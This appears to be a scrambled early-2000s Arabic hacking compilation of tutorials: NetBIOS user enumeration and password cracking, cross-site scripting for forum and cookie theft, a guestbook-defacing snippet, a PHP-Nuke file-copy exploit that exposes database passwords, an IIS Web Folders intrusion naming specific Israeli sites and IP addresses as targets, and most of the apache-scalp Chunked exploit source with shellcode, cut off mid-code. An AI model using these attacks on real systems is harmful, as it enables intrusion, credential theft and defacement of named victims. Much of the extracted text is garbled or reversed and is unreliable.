احیانا یكونهجوم حرمان خدمه واحیاناهجوماقتحامكامل حسبالموجود والمتوفر والمعلوماتالموجوده 

لدینا..........‏ طیبلنفر ضاننا ودنا نخ ش على شركهمعینهباسم aswind.COM الخطوهالأولى هي 

التعر ف على مد ى عنوان ip الخاصهبهذهالشركه وهذا سهل 

اول شيانصحبالتسجیلفي موقع INTERNIC.NET حتىیعطونك خدما تتستاهل 

هناك طریقتینلمعرفهالايبي اولا 

عن طریقالموقعINTERNIC.NET 

والثانیه عن طریقبرنامجالدوسبالامر 

: 

: 

NSLOOKUP 

SET TYPE = ALL 

aswind.COM 

را حتطلعلك المعلومات هذيبالضبط 

Domain Name: ASWIND.COM 

Registrar: ONLINENIC, INC. 

Whois Server: whois.OnlineNIC.com 

http://www.onlinenic.com/Referral URL: 

Name Server: DNS.ASWIND.COM 

Name Server: NS1.ASWIND.COM 

Updated Date: 01-apr-2002 

معنا الكلام هذاان شركه aswind.comوضعتارقامالملقامات الخاصه ب‎2‎ = DNS 

یعني عدد‎٢‎ خادم DNSوسوتلها نشریعني هناك علىالاقل سیرفرین شغالینبخدمه DNS یعنيهم 

یتعتقدونان الموضو ع ماراح یاخذكثیر من طاقهالتشغیلللأجهزه خاصه DNS 

هنافي مجالللدخولوتعدیلبیانات DNSبمعنىانالعملیهتصیر واسعه شويفقطقمبنشر عنوانین من 

عنواوین Ipفق ط مثل ماسوو aswind.comلكنلنفتر ضانهفیه اكثر من عنوانلنفول ٦ مثلا . 

عشانكذااقترح على الشركاتوضع عنواونین IPللنشر ووضع خوادم DNS علىاجهزهقدیمه وبطی ئه 

لأنكاساسافي حاجه ل DNSداینامیكي وهذایعنيانكتقوم بتشغیل WIN2Kوخدمه DNS على جهاز 

واحد وهذي من الافكارالجیدهفي نظرياذا وضعت جهاز خا صفقطبال DNS 

طیبلنفر ضانك مالقیت شي علىاجهزه DNS وبماانكفيبدایه هجوم هذایعنيانه عندك متسع من 

الوقت اذنقم بتجریب جمیعالعناوینالمتوفرهلدیك والتي حصلت علیها من HowISوصدقونيفیه 

ادوات موجودهبالنت مممكنانهاتمسح مجموعه IP موجودهفي شبكهمعینه 

طیبقم بعمل مل فاسمه LMHOSTS یوجدفیهاسم NetBiosلكل عنوان IPاستطع تانكت حصل 

علیه 

٢٠٠




یعنيانت عرف تانالشبكه منكلاس C وعنوانها ٢٠٠٫٢٠٠٫٢٠٠٫٠ سولك مل ف LMHOSTSباسم 

Net view وهكذا بعدینتحتاج عمل N2 فباسم = 200.200.200.2 NetBiosومل 

//servername 

٢٥٤ 

\ 

) 

لكلاسم من N1‎إلى N254 یعنيكانكتسوي سكانبورتب سبطریقهثانیه 

من جهاز رقم ‎١‎إلى جهاز رقم 

وبالنسبهللأجهزهالص حیحه سو فتشتغل الخدمهفیهاام العناوینالغیر متصلهفلنتستجیب طبعاً‏ 

طیبانتالاالان ماتقدرتسوي شي 

بستقدر تتاكد من حساب Administrator موجود والا لااوتمتغییرهاواذا هناك یوزر نیمبنفس 

الصلاحیا تان تبطبیعه الحال ماتقدرت حصل علیهبسهوله 

اذنهناكابواب خلفیهللحصول علیه من بع ضالطرقالوصوللبع ضاسماء المستخدمینالموجودینفي 

الشركه وهذایعتبر عیب من عیون Windwosلانهاتطنشهمههههههههه مدريلی ش 

فیهامرتقدرتعر ف من خلالهبسألاالانانت ماتقدرتسویهلانه مالك حق وصول مباشریعنيانت لازم 

ت حصل على usernameلاي and password یوزر موجودفيالمجالالامر هو net user وهو 

یستعرضلك جمیعالمستخدمینالموجودینبالمجال 

لكنفیه طریقهلل حصول علىاسماءبالهبل ههههههه 

كی ف ؟؟ 

الان عندما یقوم مستخدم بتسجیل دخول یقوم جهازهلیسفق ط بتسجیلاسمهفقطبلاسم جهازه یعني على 

سبیل المثال مدیرالشبكهاذا صار عنده زحمه یشغل خدمهاسمها مراقبه النظام حتىیعر فانه وصلللحد 

الأقصى 

عندما یقوم مستخدم بتسجیلالدخولتقوم خدمه Messenger Service بتسجیلاسمالمستخدمكاحد 

اسماء NetBios الموجودینفيالشبكهالي ان تاساسا جالستبحث عنهم وعلىافترا ضانك دخلت على 

خادم بعنوان IPفأناي 200.200.200.200 شخ صاذاقام بعمل nbtstat a- 

‎200.200.200.200‎سیتكمن منمعرفهاسم جهازك واسم المستخدم واذاكان جهازك 

MSBROWSERاو لا سو ف اتحد ث عنهابالتفصیل ( 

طیبلنفر ضانفیه شخ صباسم John ورقم‎200.200.200.50‎ IP موجودفيالشبكهفانكاذاقمت 

راح یضهرلكانهفیه شخ صباسم john واسم جهازه 

) 

بعمل Nbtstat -a 200.200.200.50 

johnPC 

. ( 

( 

الأن موجودمعكاسم مستخدم ‏(احتمال یكون ( Administrator طیب و ش نسوي 

؟ 

قوم بتعطیل خدمه Messengerفي Service جهزك ) ولنیتمتسجیلاسمكفيالنطاقیعني بتخ ش 

مخفي 

وبالسنبه ل MSBROWSER اذا شفتها بعد عملالامر nbtstat a- 

هذایعنيانهاستعرا ض رئیسيللمجال وهذا مناكبرالاخطاء التي یقومونبها مدراءالشبكا تلان مراقب 

المجال یدو خ لا یستطیعالتجمیعوتستطیعاستغلال مثل هذه الثغرات دائمافيالشبكاتالدا خلیه 

طیبانتالان حصل ت علىاسم المتسخدم 

انت محتاجكلمه المرور وهذي هيالمشكلهیعنيانت ضمیت جهازك مع الشبكهلكن ماقدرتت حصل على 

كلمه المرورلكنتقدرت حصل علیها nt senstiver او مت حسس الشبكه معلی ش ماني متاكد من 

السبیلنق 

طیبكی فاقدراحصلفعلیا علىكلمهالمرور 

غالبا ماتكونكلمات مرورالمستخدمینتاففه جدا هاذاذا وجدتاصلا 

یعنيبرنامج مثل l0pthcrackیحللك المشكله....‏ 

٢٠١



" Cross Site Scripting 

" 


$$$$$$$$ 

الكاتب tcp: 

$$$$$$$$ 


معرفةتامهبلغة HTML 

: 

اطلاع غیر متعم ق علىلغاتالسكربتینق وهي JAVASCRIPT ,PERL ,CGI ,VBSCRIPT 

ومن وجهة نظر شخصیةالمصایبكلها منالجافا سكربت والهتمل 

========================================================== 

الاهدا فالمنشوده 

: 

‏*افهامالقارئ عنالكیفیة التىیتمفیها سرقةمعلومات هامه من جهازالمستخدم 

‏*اختراقالمنتدیا ت من نو ع VBULLETINاو YaBBاوالمجلا and UBB ت منالبهب نیوكاو 

بوس ت نیوك 

* افهامالقراء عن الكیفیةالتي تتمفیها سرقةالكوكیزاواختطا فالجلسة منالمستخدمین 

‏*ان یستطیع القارئتوسیع مداخلالاختراق 

: المشكلة 

كما هومعرو ففان مستعرضاتالوب مثلالاكسبلورراو نت سكیب ‏...الختاتي مترجماتالنصو صاو 

السكربتات 

مبنیة داخلها ویتمترجمة السكربتا ت على جهاز المستخدمفلواننا طلبنا صفحةكانبها سكربتمعین 

فانالمستعر ضیترجم هذاالسكربت ویظهره على نفس الصفحهالمطلوبه 

. 

امابالنسبةللمندیاتاو مجموعاتالنقا شفانهاترف ض مثل هذهالسكربتاتوتعتبرها خر قللخصوصیة 

اوقدتستغلفيا غ را ض سیئةلسرقةمعلوما ت حساسة منالمستخدمین 

المثالالتالي یوضحكیفیةادراج السكربت 

: 

٢٠٢



message. Hello FOLKS board. This is a 

malicious code 

end of my message. This is the 

انكلمة maliciousتمادرجهااو code حقنهافيبین علامتي السكربت وقدتحتوي علىكود خبیث 

یسرقاو یرسلبیانات ‏...الخلذلكفان مصمموابرامجالمنتدیات ومطوروا یمنعونهاالااذا مكنهاالادمن 

اوالمصمماوقدیتماستخدامهااذا مكنالمنتدىتفیل HTML مثلایتمادراجالسكربت مكان خاصیةالامج 

img>document.write(' 

؛'HREF="http://example.com/comment.cgi? mycomment= A> 

here Click




هنااستخدم نفسالسكربتالسابقلكن هذهالمره طورهاكثرلیكون مستخدمافيادراج مل ف من موقعاخر 

والذي 

هوبالاسم BADFILE ولان مصدرالبیاناتادخلفیه عدة مصادراخرى عن طریقالسكربتالمذكور 

فأن هذاالهجوم 

یسمى ب cross-siteاو scripting الترجمه من عندي ‏"برمجة عبور الموقع ‏"لاننا عبرنا 

باستخدامبرمجة 

السكربتات اكثر من موقع واذاكنتتلاحظفيالسیكیورتيفوكساوالمواقعالامنیهتختصر ب CSS 

وهياختصار 

ل scripting cross-site ولیس ل 

CASCADE style sheets اياوراقالانماطالمت الیة 

قد یدخلبدل الوسماو علامةالسكربتاي من الوسومالتالیة 

and ، ، ، 

ومنالممكنان یكونهناكوسمالنماذج من وسوم HTML وبنفسالافكارالسابقة یمكنتنفیذ 

الاوامر 

منهالسرقةالكوكیزاوبیاناتاخر ىاوتوجیهكلصفحاتاخرى 

اذاكنتقرات ماكتبته عن التكویدالسداسي عشر والیونیكودتستطیعالانانتفهم مااقصده 

========================================================= 

ولمزید منالتفاصیل 

http://www.cert.org/advisories/CA-2000-02.html 

: 

http://www.perl.com/pub/a/2002/02/20/css.html 

... 

٢٠٤


كود تدمير سجل الزوار 

" 

" 


$$$$$$$$$$ 

الكاتب:العبقري 

$$$$$$$$$$ 

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

كود صغیر جداب حجمه،كبیر بقدرته علىتدمیر سجلالزواربالكامل...انتمتعرفون طبعاكیفیة عملتوقیع 

في سجل الزوار،‏ الأسم ‏-الأیمیل - موقعكالشخصي-‏ تقدیركللموقع - طریقة الأستدلال......والنقطه المهمه 

وهي كتابةتعلیقك على الموقع؟؟؟؟؟؟؟ 

ن حن سو فنضعكل شي حسب ماهو مطلوب ولكن عندما نأتيلكتابةالتعلی ق...........نق ف ونكتب : 

هذا هوالكود 

: 

================================================== 

h3>put your text here


شرح شبه مفصل عن الثغرات 

" 


" 

$$$$$$$$ 

الكاتب icer: 

$$$$$$$$ 

الموضو عالیوم ینقسمالىالتالي : 

- ١ كی فتجد اكسبلویتات ؟ 

‎٢‎‏-كی فتستعمل الاكسبلویتات ‏(دعونا نسمیهااستثمارات ‏)؟ 

انوا ع مختلفه منالاستثمارا ت...‏ 

مواقع مفیدهللب حث ع لالثغرا ت...‏ 

-٣ 

-٤ 

×××××××××××××××××××××××××××××××××××××××××××× 

a face at the interface : 

الاستثمارا تتستخدم عادهلكيت حصل عل الرووت عل نظام معین ‏..والرووت هو عباره 

عنالادمینیستراتوراو مدیرالنظامالذيتریداختراقه...‏ الاستثمارات دایما ماتوجد 

بواسطه مل ف معین یجعكتستطیعالدخولبواسطهال httpبصوره طبیعبه 

لذلك نستخدم scannerلب حث عن هذاالاستثمار ‏....یو جد العدید منالاستثمارات مثل 

.. 

BOF (buffer over flow) , DoS ( denial of service) , 

... 

.... 

و علىفكرهاناااؤمنانال هجومال DoSهياكسبلویت 

و یوجدایضا الثغراتالتي تتیحلكتنفیذ بع ضالاوامر مثل عر ض و مسح والكتایه علىالملفات 

م ثالاكستینشنز و غیرها بالنسبهلموضو عالبوفراوفرفلوفهو یشبهالى حدكبیر 

حی ثیعتمد علىارباكالسیرفیر بفی ض من المعلومات و یمن حك الروو ت.‏ 

اما هجومال DoSفهو عباره عنارسال GETال / POST السیرفیر مما یؤديال 

حدو ث OVERLOADلوحدهالمعالجهالمركزیهللسیرفیر اللي هو عباره عن جهاز یعمل 

‎24‎ساعه ‏)فیتوق ف الموقع عنالعمل و یصبحالسیرفیر....‏ OFFLINE 

) 

ال DoS 

×××××××××××××××××××××××××××××××××××××××××××××××××× 

١- كی فتجداستثمارات ؟ 

لكيتستطیعانتستثمرثغرهمعینهفي سیرفیرفانه یجب علیك اولاان تتاكدانالثغره موجودهفي 

السیرفیر 

ولماكانالاستثمار عباره عنفایل معین ‏..فانه یوجد طریقتینلمعرفه مااذاكانتالثغره موجودهام لا..‏ 

اما عن طریق التطبیق مباشره من خلالالمتصفحكمافي حاله بع ضثغ را تامتصفح مثلالیونیكوداو 

الفرون تبیج 

اوانتستخدمالسكانرزفيفح ص الموقع .. طبعا منالمعرو فانثغرات المتصفحلها سكانرزال 

threads 

و هيتسمىال cgi scaners بعضها ممكنانتضی فله ملفاتبهاثغرات والبع 

احبذه




red hat 7.2 ...... 

×××××××××××××××××××××××××××××××××××××××××××××× 

‎٢‎‏-كی فتستغل هذهالثغرات ؟؟ 

الكثیر منالناس عندما یف حصون موقعبسكانر ‏(و خاصهال ) shadow و یطلعلهماستثماراتمعینه 

‏..لایعرفونای ش یسوون 

بعدكذا؟؟؟؟...‏ 

لوانت بتستعملالشادو حتلاقي urlبجانبالثغره تزرو العنوان ده وتقرهكلكلمهتلاقیها هناك 

اواذالمتجداي urlفيالسكانرزالاخر ى یبقىتاخداسم اثغره وتروحالموقع rootshell.com 

وتكتبفي محركالب حثاسمالثغره و ان تان شاءااللهفي ٩٩% من الحالات بتلاقياستثمارلهاي 

الثغره..‏ 

وكی فتستخدمها واشیاء زيكده.......‏ 

.. 

.. 

××××××××××××××××××××××××××××××××××××××××××××× 

: 

-٣ 

.. 

.... 

.. 

انوا ع مختلفه منالاستثمارات 

طبعاالكثیر منالاستثمارات یكون هدفها هو من حك الرووت علىالسیرفیر .. معنىكلمه رووتهو المدیر 

اوالادمین ‏..لا یوجدايقیود علىال commands اللي الرووت یكتبها ايلككلالصلاحیات على 

السیرفیر 

وال حصول على الرووت یمكنانیتم من خلال العدید من الثغرات مثلثغراتال , httpوال BOF و 

غیرها 

كهاتعتمد على طریقه عملالثغرات ‏..فهيقدتعطيلك صلاحیهقراءه و حذ ف والكتابه عل الملفات و 

ایضا 

رفع ملفاتالىالسیرفیر 

اوقدتعطيلك الكلمه السریه واسمالیوزرامافي صوره واضحه مثلالمل ف config.inc او مشفره 

بمقیاس 

... DES/MD5‎كمافي المل ف .... etc/passwd‏/فيانظمهالیونیك س...‏ 

بالنسبهللبفراوفرفلوفهو یشبه الى حدكبیر هجومال DoS ولكنه لا یسبب ضررللسیرفیر مثلما یسببه 

هجومال DoSالمهمانهفياغلبالاحیان یكون البفر عباره عنارسالاوامرللسیرفیرتنتهي دائما 

باعطائك 

صلاحیهالرووت ... و هذابسبباستقبالالسیرفیرلكم هائل من الداتافیؤدي الىارباكالسیرفیر..‏ 

×××××××××××××××××××××××××××××××××××××××××××××××××× 

××××××××××××××××××××××××××××××××× 

: 

-٤ 

: 

packetstorm.securify.com /.securityfocus.com /www.insecure.org 

‏/‏http://rootshell.redi.tkو غیرهاابحث سو فتجدالمزید :).... 

مواقع مفیدهللب حث عنالثغرات من خلالها 

یمكنك الب حث عنالاستثمارات الجدیدهفي هذه المواقع 

٢٠٧


" 


" كیف تستخدم الثغرات 


$$$$$$$$$$$$$$$$$ 

الكاتب:‏ VoOoDa BE$T 

$$$$$$$$$$$$$$$$$ 

البدایة : 

txt. : 

ویعني مل ف مل ف نصي..من الممكناي یحتوي على سورسكودلبع ض الثغراتاو البرامجالمكتوبة 

بالسي اكمل القراءة لتعر فكیفیةاستخدامها..‏ 

، البیر..‏ 

 

c. : 

هوبرنامج سيلكنه سورسكودفقط..واغلب الثغراتیتم كتابتهابالسي..هذا یفتر ض علیك 

علیكتحمیلهثم عمل (compile) ‏_وهذایعنيتحویلالسورسكودلمل ف برنامج)_ثمتثوم 

بتشغیله...‏ لكن المشكلةهناانهلن یمكنتشغیلهاتح تبیئة ویندوز..فیجبان یكون عندك Linuxاو 

) 

.. Shell Account 

بع ضالتحمیلتوجهللمسارالموجودبه المفلثماكتب:‏ 

‏----




" 

تمتع بإختراق المواقع الإسرائیلیة مع هذه الثغرة 

" 

$$$$$$$$$$$$$ 

الكاتب DeadLine: 

$$$$$$$$$$$$$ 

الشرح 

اولاً‏ الثغره یاأخوانتطبق على سیرفرات 

: 

: 

Microsoft-IIS/5.0 on Windows 2000 

یاأخوانكل مانحتاجه هياداهبسیطه یقدمهالنا وندوز ٩٨ وانني لااعلمانكانتالنسخالاخرىتمتلك 

مثل هذهلخاصیهام لا لاننياعمل على نظامینفقطلینكس ماندریك ووندوز‎٩٨‎فقط 

: 

الاداه هيFolders : Web 

این نجد هذه الثغره : 

حسناً‏ سو ف نجدهاانشاءاللهفي الخطوات التالیه 

: 

ادخل على My Computer 

ثم ستجدهاهناكلیس داخل السياو شيء آخربل داخل Myفق Computer طیعنيتكون هي معالسي 

والدي الى آخره 

نفتح یاأخونالمل ف المسمى Web Folders 

ثم سنجدالآتي 

: 

Add Web Folder حیثهي التي ستكوناداتنا المهمهللاختراق 

نفتحال : Folder Add Web 

حیث نجدكلمة Type the location to add 

ونرىتحتها مستطیل نقوم بأدخالالآتي 

: 

http://hostname.com/ 

حیثان hostnameهوایبيالموقعانتبهقلناایبي الموقع ولیسالاسم 

والجمیعیعر فكی ف یخرجالایبيتبعالموقع وهناك دروسكثیرهبخصو ص هذاالموضو ع 

وهذه مواقعاسرائیلیهللتطیب ق حیثانهاتعمل علىایبي موحد 

: 

mail.talcar.co.il 

daihatsu-israel.co.il 

daewoo-israel.co.il 

٢٠٩




ندخلبالمستطیلالذيتم ذكره 

: 

http://192.117.143.121/ 

ثم نضغط علىكلمة : Next 

وهنا سو فتعملالاداه بتحمیل ملفات الموقعوتعطیك خاصیةالادمن وهيتحمیل وازالة الملفات 

فبعدان ینتهي البرنامج منالتحمیلتظهرلككلمة : finish 

عندهاتذهب الىال : Web Folder وتجد مل فالموقع هناك ومسمىتحتایبي الموقع 

موقعاخرللتطبیق 

212.199.43.84http://www.israwine.co.il/ 

: 

ملاحظه ‏:اذاتم طلبادخالباسوورد ویوزر نیمفأعر فانالثغره مغلقه 

اواذا دخلتالى الملفات ولمتجداي ملففمعناهانالثغره مغلقهایضاً‏ 

اسئلااللهالتوفیق والعافیهاللهمامیناللهمامین...‏ 

٢١٠



‏"ثغرة نیوك " 


$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$ 

الشرحبالأنقلیزیة : 

day from LucisFero and supergate٠here your :twlc 

CDT ١٤:٢٥:٥٨ @ ٢٤ Posted on Monday, September 

advisories :topic 

twlc security divison 

٢٠٠١/٠٩/٢٤ 

.Php nuke BUGGED 

:Found by 

LucisFero and supergate 

twlc/. 

Summary 

it allows you to 'cp' any file on ...This time the bug is really dangerous 

...or even upload files ...the box 

is 

٥٫٢is ok while the final 

dSystems Affecte 

all the versions ARE vulnerable 

.i wonder why a released c) '١RC ٥٫٠ except ' 

(bugged 

Explanation 

Do you need sql password? 

١=php?upload.admin/net.server.www//:http 

config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif& 

txt .hacked=php&userfile_name. 

the admin 'login' page will be prompted just go to 

php .txt and you will see config.hacked/images/net.server.www//:http 

that as everyone knows contain the sql's passwords, you can even 

and try ...un' to find all the ways to use iti leave you the 'f...upload files 

to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs 

.php nuke and NOT TO LET YOU HAVE FUN 

٢١١




:php contains this routine.admin ...let me explain you the bug 

ridesab$ EMANELIF_TPIRCS$)dirname؛)‏ = 

=extrows t$ 

= sloctxet$ 

= ridu$ 

"/"=ridw$ (ridw$!)if 

‏$‏FileManager"=po؛"‏ (lecnac$)if 

} (daolpu$)if 

؛‎٢٠‎ 

؛‎٨٥‎ 

FLES_PHP$)dirname؛)‏ 

؛ 

eman_elifresu$.ridw$.ridesab$،elifresu$)copy؛)‏ 

noitcatsal$ ‏$‏ridw؛"‏




٤٢١ =php?sid.article/net.twlc.www//:net article http.twlc.www//:http 

com.bugtraq@securityfocus 

-good luck-org .phpnuke.www//:http 

Nuke Web -PHP :Project ٧٥١١=di_puorg؟/tracker/net.sourceforge//:http 

Portal System 

and of course mailed to the author of php nuke 

remember that trojans are 

...bugs, ideas, insults, cool girls)tacts con 

:(null/dev/directed to 

net.lucisfero@twlc 

net.supergate@twlc 

(yes we are patched)net .twlc.www//:http 

.bella a tutti .peace out pimps 

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= 

=-=-=-=-=-=-=-=-=-=-=-= 

الخطأ البرمجي : 

eof 

ridesab$ EMANELIF_TPIRCS$)dirname؛)‏ = 

= swortxet$ 

= sloctxet$ 

= ridu$ 

"/"=ridw$ (ridw$!)if 

‏$‏FileManager"=po؛"‏ (lecnac$)if 

} (daolpu$)if 

؛‎٢٠‎ 

؛‎٨٥‎ 

FLES_PHP$)dirname؛)‏ 

؛ 

eman_elifresu$.ridw$.ridesab$،elifresu$)copy؛)‏ 

noitcatsal$ ‏$‏ridw؛"‏




FileManager=php?op.admin :Location")Header ؛")‏ 

exit; 

{ 

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= 

=-=-=-=-=-=-=-=-=-=-=-= 

الثغرة : 


config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif& 

txt.hacked=erfile_namephp&us. 

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= 

=-=-=-=-=-=-=-=-=-=-=-= 

الثغرة بعد التعدیل 


php.config=elifresu&/=txt&wdir.ultramode=php&file_name.config=elif& 

txt.ultramode=eman_elifresu& 

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= 

=-=-=-=-=-=-=-=-=-=-=-= 

عملالثغرة:‏ 

-= طبع مل فالكونفیج php.config الى المل فالنصيالموجودtxt.ultramodeلنتحتاجتحمیل 

مل ف نصيلطبعالمل ف 

كما هو موجودبالشرحالأنقلیزيیعنيفكر واستنتج :-) ولأن بع ض المواقعتمنعالتحمیلالىالموقعالآن 

ما علیك سو ىالدخولالى txt.ultramode/com.server//:http 

وستجدباس والیوزر التابعلقاعدةبیاناتالموقع=-‏ 

ملاحظات 

‎١‎‏-بدل com.serverبالموقع الراداختراقه 

‎٢‎‏-تأكد من موقع المجلة مثال 

nuke/com.server//:ttph : 

٣- هذه الثغرةلاتعمل معاصدار‎٥٫٢‎كما یظنالبع ض...‏ 

٢١٤



ثغرة 

" Chunked 

" 


$$$$$$$$$$$$$$$$$$$$$ 

angels-bytes 

$$$$$$$$$$$$$$$$$$$$$ 

منقول من موقع 

كلنا سمع بثغرهتسمى Chunkedل ، Apache السبب لعدمتحد ث موقع angels-bytes عنها هو 

أنها أتتقبلإنطلاقالموقع ‏،الآ ن سأضع ، Scanner Retina Apache Chunked وهيأداة 

تقوم بفح ص نطاق من ٢٥٤ عنوان آيبي ، وتظهرلك ما منها مصاببهذهالثغره.‏ 

إ ذاأردتمعالجة هذهالثغره عند وجودهافأنص حك بتنزیلأباتشي ‎٢٫٠٫٣٩‎فهو الأفضلالى الآن 

هذه هي وصلةالتنزی ل 

http://www.apache.org/dist/httpd/binaries 

أمالمسألة إ ستثمار هذهالثغرهفسو فأضعلكمأفضلأستثمارین 

الخطأفيأباتشي 1.3.24 واعلىإلى‎٢‎ و من‎٢‎إلى ، ٢٫٠٫٣٦ dev‏-وهيفيالروتین البرمجي الذي 

یتعامل مع رسائلالخطأ 

هذان ا لإ ستثمارانتستخدمان منقبل مهاجم بعید لتسبب طفح م حليفيالسیرفرالمصاب ، مؤدیهبذلكإلى 

إعادة كتابهفي الذاكرة ، وبطریقة ماتسمح لتنفیذكود 

/*(( 

*/ 

/* 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

قدتمتجریبها وإختبارها منقبل angels-bytes.comقبل وضعهالكمهنا 

حصلنا علیها من سیكورتيتیم*/‏ 

(( 

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming 

it failed */ 

٢١٥




#define RET_ADDR_INC 512 

#define MEMCPY_s1_OWADDR_DELTA -146 

#define PADSIZE_1 4 



#define REP_POPULATOR 24 

#define REP_RET_ADDR 6 

#define REP_ZERO 36 

#define REP_SHELLCODE 24 

#define NOPCOUNT 1024 

#define NOP 0x41 

#define PADDING_1 \\'A\\' 

#define PADDING_2 \\'B\\' 

#define PADDING_3 \\'C\\' 

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s); 

#define PUT_BYTES(n, b) memset(p, b, n); p += n; 

#define SHELLCODE_LOCALPORT_OFF 30 

char shellcode[] = 

\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\ 

\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\ 

\\x1f\\\" 

\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\ 

\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\ 

\\x02\\\" 

\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\ 

\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\ 

\\x04\\\" 

\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\ 

\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\ 

\\xb8\\\" 

\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\ 

\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\ 

\\x03\\\" 

\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\ 

٢١٦




\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\ 

\\x89\\\" 

\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\ 

\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\ 

\\x80\\\" 

\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\ 

\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\ 

\\x50\\\" 

\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\ 

\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\ 

\\xcc\\\"; 

struct { 

char *type; 

u_long retaddr; 

} targets[] = { // hehe, yes theo, that say OpenBSD here! 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f }, 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa }, 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae }, 

}; 

int main(int argc, char *argv[]) { 

char *hostp, *portp; 

unsigned char buf[512], *expbuf, *p; 

int i, j, lport; 

int sock; 

int bruteforce, owned, progress; 

u_long retaddr; 

struct sockaddr_in sin, from; 

if(argc != 3) { 

printf(\\\"Usage: %s \\\\n\\\", argv[0]); 

printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\"); 

printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000 

٢١٧




127.0.0.1:8080\\\\n\\\"); 

printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\"); 

printf(\\\"Target ID / Target specification\\\\n\\\"); 

for(i = 0; i < sizeof(targets)/8; i++) 

printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type); 

return -1; 

} 

hostp = strtok(argv[2], \\\":\\\"); 

if((portp = strtok(NULL, \\\":\\\")) == NULL) 

portp = \\\"80\\\"; 

retaddr = strtoul(argv[1], NULL, 16); 

if(retaddr < sizeof(targets)/8) { 

retaddr = targets[retaddr].retaddr; 

bruteforce = 0; 

} 

else 


srand(getpid()); 

signal(SIGPIPE, SIG_IGN); 

for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) { 

/* skip invalid return adresses */ 

i = retaddr & 0xff; 

if(i == 0x0a || i == 0x0d) 

retaddr++; 

else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4)) 

continue; 

sock = socket(AF_INET, SOCK_STREAM, 0); 

sin.sin_family = AF_INET; 

sin.sin_addr.s_addr = inet_addr(hostp); 

sin.sin_port = htons(atoi(portp)); 

if(!progress) 

printf(\\\"\\\\n[*] Connecting.. \\\"); 

٢١٨




fflush(stdout); 

if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) { 

perror(\\\"connect()\\\"); 

exit(1); 

} 

if(!progress) 

printf(\\\"connected!\\\\n\\\"); 

/* Setup the local port in our shellcode */ 

i = sizeof(from); 

if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) { 

perror(\\\"getsockname()\\\"); 

exit(1); 

} 

lport = ntohs(from.sin_port); 

shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff; 

shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff; 

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * 

REP_SHELLCODE) 

+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * 

REP_POPULATOR)); 

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n\\\"); 

for (i = 0; i < REP_SHELLCODE; i++) { 

PUT_STRING(\\\"X-\\\"); 

PUT_BYTES(PADSIZE_3, PADDING_3); 

PUT_STRING(\\\": \\\"); 

PUT_BYTES(NOPCOUNT, NOP); 

